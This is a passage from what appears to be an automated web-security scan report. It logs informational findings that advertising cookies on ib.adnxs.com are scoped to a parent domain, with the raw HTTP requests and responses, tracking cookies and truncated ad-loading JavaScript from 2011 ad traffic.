Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:11 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 15:35:11 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:35:11 GMT
Content-Length: 1357

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAA
...[SNIP]...

10.23. http://ib.adnxs.com/acb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /acb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb145072=5_[r^kI/7ZVO@Lm*bfY>AYR8I?enc=FK5H4XoUCkBFtvP91HgHQAAAAKCZmfk_Rbbz_dR4B0AUrkfhehQKQNspbpGFnStGSsYda6b2ziUcCshNAAAAACgjBgA3AQAAHgAAAAMAAAAmSAUAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA3xABAgUCAAUAAAAAfyE2KQAAAAA.&tt_code=cm.rub_usatoday&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=113105%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26managed=false; sess=1; icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb145072=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?Mc9aQ3p9'^<S@I)Ql?!>Ae1f''iDi%3^'oLfC].kus@gU@%TxzHNX4[`WiVr*#9$vly>pFw2R!S3(%@w4<XPfGwI=KFxaLe[#mlK'C6EcG7hQU*o4SxrFd%j8zSG'hZ^D=OGMdEBEY11Uo_(eivJEYD@Ho?(^)etsLR7z'ns49!Ux5mR>#lMG'iLd<GTD$#AwtORJ@vBPA8q:p2Hv8s$nLSw`@cT6'=rqvg/PJyYt[-L!L(s`](-sRB6bA$j7/8l`/qMkYNHmLjx!j+Cat8-(!nXx8T`oWuF:Y11:LvJSN%2pSV-#:g'=Sb.-<6h+YEM%gG@w_9^gcM7pD=!j6CenGiB7>kko?i=<)!e3YI4KDvQEb`X8)alPKr$ETqBnzTMkQg+%-)erfq'IW*l8wrT7cUm4]3SP4j+tx.U-$'YUm@*y6x(A3H+*S0$getvNu.MeHeUf-#2%G*>DY/A<By?VIzutD*g8cKK+`6>[DwWqbhOid^wC>`:mn[J>?-#Fp6<W)3Xikw.$@ePbWiO6d:_'xt%OTZIzzfW[Loft(ZmLx[_-MtHVG'T'sPt9ssVv3fjt4@6bcwvH%-]h'oo`t?2P/4nA!gq([Ift!^HL*Xe]Z0f#*hQ*v9^cJiiW^]P3'vI-$iNx:M; path=/; expires=Sun, 07-Aug-2011 15:37:08 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:37:08 GMT
Content-Length: 2841

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">function writeJS(doc){
var str='';
str += '<script type="text\/javascript"> \n';
...[SNIP]...

10.24. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://matcher-apx.bidder7.mookie1.com/appnexus?adnxs_uid= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIhboCEAoYAiACKAIw4pSg7gQQ4pSg7gQYAQ..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0s(F?MZLVSh`#>:`0`WW1(8g]RLPfbGhP:t/X(N=g3]%zH1@gU@%TxzFyMpF8#2ZS9N/Wuft/yR0tPsQ5U^geeVQTEc[7)3dU7eOC^p-u?:VGSah7Q=X?80Yp2LItDKo5KF@=(](`Ksb^3L>1?2KGL7SayTg7G.(0t$'jw_MJWRI3ScuGPZxluNNFnCCJPuqw.R(*S5Q.0VPjnm>@dEl:hrjd>IObXEMOWc10PCZ#:AC98<SRvJ?jr$PlNXO^z-r6%a_yk`*qBJI>blx8BQ>ZHi5[N!/Dz6)yJ<-?7cK+>z6/PCfI![Eg2zT$9.A#Rgu'*nw8yClo/.yZOhK).s<[8(GVLhu'f?x5NR3'O>QTvqi<N3s*p/AnG=wfH)En(q$8wH]sy<S.!O0UcLX0fdL.T(>D$`K9.LlOsosU38T(oFdkSzMu]lWh/[1h0)/K7xc$[fvmvGXvMdp?igeWn</VHw@P9lAaMY=jfA'BYkF0'H]Qkv.Ru%g619/*`K+^$euSVt(vOz1bR.jLdTK=9/ru/xg]rpX!eBc97)c77Z!hD:z*pBk.q5cEd#aAw`^ac2`!bX=%fnVKG$Msxef5K$qR03Qx>=#h%VZ$RW/WY[Tts%HHDk$yjpv0Q5ZEt>ghVfv79mwSjLafXH`Byo%!

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:39:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:39:28 GMT; domain=.adnxs.com; HttpOnly
Location: http://matcher-apx.bidder7.mookie1.com/appnexus?adnxs_uid=
Date: Mon, 09 May 2011 15:39:28 GMT
Content-Length: 0


10.25. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-65201734_1304955420,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-65201734_1304955420%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D637150%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VsdNmQotNi@m4]2M2UNvB^a*m(qsP<$5Y8+$btG4Ak815t9uZT9Y!Tss2(U=u08T#U*@.xf`p:/Y=@C'V`%3VDqSpO@2LNZ!a`mkrE=4S%OOWjxx?I%f.`8P<Q_=:K!N$S@p'W+mpx*RcdvEi=A'#X@PH+HTK.^[b/a`!b`#0B@$kf.F^2QqXMVbeza'$l/3mV)X=JbA6Dg2elt<r$Y2-LH'3+IRb[FhsHCNft/g2g4RKbYm([]%2pZmoc2O!J^AMCh5bcwNx(n]g=GtY31<eFv=Py[$vPQoKQvElD]jJ?WfA/mkYXJ7^YX%RfRfRP:B4Z:9)LOWaVQ._BYWVIt9SF3qfRr>MH2W4cYAiW:f92EX!%l#-=WZMff'fhbMApWS<YV1Fhq@f^5^1!7tcd#9Tdp::!P@XBy<13HmsxW[=X*.JJZAZnXKfBb0ZkTQDm.8h6r:GEYo'apKW77#x>UomXwbCI8b[s00xdd5UEfSDB=f<o'@gNUP)v6ITb?O-]le_)Ef0+aq9aCbvK/[`(!X92Jj!xp88_699MG!SR'2XPaU>9U<.1_BU7EhhEGpC$Dl]#Jj1o$JVk<kds/pZAV[23<*Wg2v^crt$`<vw8HjZ)4K>b:4bVPY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*; path=/; expires=Sun, 07-Aug-2011 15:37:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:37:01 GMT
Content-Length: 701

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-65201734_1304955420,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-b
...[SNIP]...

10.26. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-45954758_1304955419,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-45954758_1304955419%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D310802%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_VsdNmQotNi@m4]2M2UNvB^a*m(qsP<$5Y8+$btG4Ak815t9uZT9Y!Tss2(U=u08T#U*@.xf`p:/Y=@C'V`%3VDqSpO@2LNZ!a`mkrE=4S%OOWjxx?I%f.`8P<Q_=:K!N$S@p'W+mpx*RcdvEi=A'#X@PH+HTK.^[b/a`!b`#0B@$kf.F^2QqXMVbeza'$l/3mV)X=JbA6Dg2elt<r$Y2-LH'3+IRb[FhsHCNft/g2g4RKbYm([]%2pZmoc2O!J^AMCh5bcwNx(n]g=GtY31<eFv=Py[$vPQoKQvElD]jJ?WfA/mkYXJ7^YX%RfRfRP:B4Z:9)LOWaVQ._BYWVIt9SF3qfRr>MH2W4cYAiW:f92EX!%l#-=WZMff'fhbMApWS<YV1Fhq@f^5^1!7tcd#9Tdp::!P@XBy<13HmsxW[=X*.JJZAZnXKfBb0ZkTQDm.8h6r:GEYo'apKW77#x>UomXwbCI8b[s00xdd5UEfSDB=f<o'@gNUP)v6ITb?O-]le_)Ef0+aq9aCbvK/[`(!X92Jj!xp88_699MG!SR'2XPaU>9U<.1_BU7EhhEGpC$Dl]#Jj1o$JVk<kds/pZAV[23<*Wg2v^crt$`<vw8HjZ)4K>b:4bVPY

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYASABKAEwoJSg7gQQoJSg7gQYAA..; path=/; expires=Sun, 07-Aug-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb745993=5_[r^kI/7ZVO@Lm*bfY>BVNTL?enc=FK5H4XoUCkBFtvP91HgHQAAAAKCZmfk_Rbbz_dR4B0AUrkfhehQKQGhEAHWOLGYHSsYda6b2ziUgCshNAAAAACgjBgA3AQAAHgAAAAMAAACHbQUAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA2xABAgUCAAUAAAAAtyCf0wAAAAA.&tt_code=cm.rub_usatoday&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizkOgDAMBL8SuabIro_IvCmio0L8HVuimhmt_YiqnCMm1jFE2Y50ZBUqxFUR9AxaJmg06cOelnOurv5i0X9a8br3Lo1SM8f7ARNbFDE-%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=114297%26message=eJwtizkOgDAMBL8SuabIro_IvCmio0L8HVuimhmt_YiqnCMm1jFE2Y50ZBUqxFUR9AxaJmg06cOelnOurv5i0X9a8br3Lo1SM8f7ARNbFDE-%26managed=false; path=/; expires=Tue, 10-May-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*; path=/; expires=Sun, 07-Aug-2011 15:37:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:37:04 GMT
Content-Length: 703

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-45954758_1304955419,11f8f328940989e,weath,ax.280-am.h-am.b-cm.ent_h-cm.music_h-ti.aal-
...[SNIP]...

10.27. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-49643098_1304955489,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-49643098_1304955489%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-cm.weath_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-mm.ag1-mm.ak1-mm.am1-mm.aq1-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D595286%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dcm.weath_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Dmm.ag1%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.am1%3Bbtg%3Dmm.aq1%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
